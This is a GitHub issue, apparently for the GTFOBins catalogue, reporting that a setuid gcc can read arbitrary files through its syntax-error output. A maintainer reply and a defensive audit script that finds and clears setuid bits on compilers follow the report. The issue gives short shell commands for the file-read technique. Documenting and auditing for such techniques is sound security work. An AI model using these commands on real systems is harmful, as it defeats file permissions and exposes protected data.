gcc can also be used for file read
NQNStudios opened this issue · 1 comments
NQNStudios commented
While doing the challenges for the first module of pwn.college I found a way to read files with an SUID version of gcc.
Following the format of other examples, this is how to reproduce:
sudo sh -c 'cp $(which gcc) .; chmod +s ./gcc'
LFILE=file_to_read
./gcc -x c "$LFILE"
Assuming the privileged file is not valid C code, much if not all of its lines should be output within syntax error messages.
Is this the kind of example that would be worth adding?
cyrus-and commented
While this might work to read files in general, it fails when SUID with:
gcc: error trying to exec 'cc1': execvp: No such file or directory
I assume that in a system that, for whatever reason, allows gcc to run as SUID this is already taken care of... but anyway, let's just add the file-read function.
> Is this the kind of example that would be worth adding?
Yes, please open a PR, we'll resume from that. Thanks!
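For the defender's side of the condition discussed in this thread, the following is an added example, not part of the original issue or the project's own code: a shell audit that finds compiler drivers carrying the setuid or setgid bit and can clear it. The list of file-name patterns and the function names are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit a directory tree for setuid/setgid compiler drivers.
# The name patterns below are an assumed list, not taken from the thread.

# Print every setuid or setgid regular file under $1 (default /) whose name
# looks like a C/C++ compiler driver. -xdev keeps find on one filesystem,
# so run it once per mounted filesystem you want covered.
find_suid_compilers() {
    root=${1:-/}
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        \( -name 'gcc' -o -name 'gcc-[0-9]*' -o -name '*-gcc' \
           -o -name '*-gcc-[0-9]*' -o -name 'cc' -o -name 'g++' \
           -o -name 'g++-[0-9]*' -o -name 'cpp' -o -name 'cpp-[0-9]*' \) \
        -print 2>/dev/null
}

# Clear the setuid and setgid bits on one file and show the resulting mode.
strip_suid() {
    chmod u-s,g-s "$1" && ls -l "$1"
}

# Report mode: list each finding with owner and mode.
# Returns 0 when the tree is clean, 1 when at least one finding exists.
audit_compilers() {
    hits=$(find_suid_compilers "$1") || :
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits" | while IFS= read -r f; do
        ls -l "$f"
    done
    return 1
}
```

Run `audit_compilers /` as root so unreadable directories are included, and pass each reported path to `strip_suid` once it is confirmed that nothing depends on the bit.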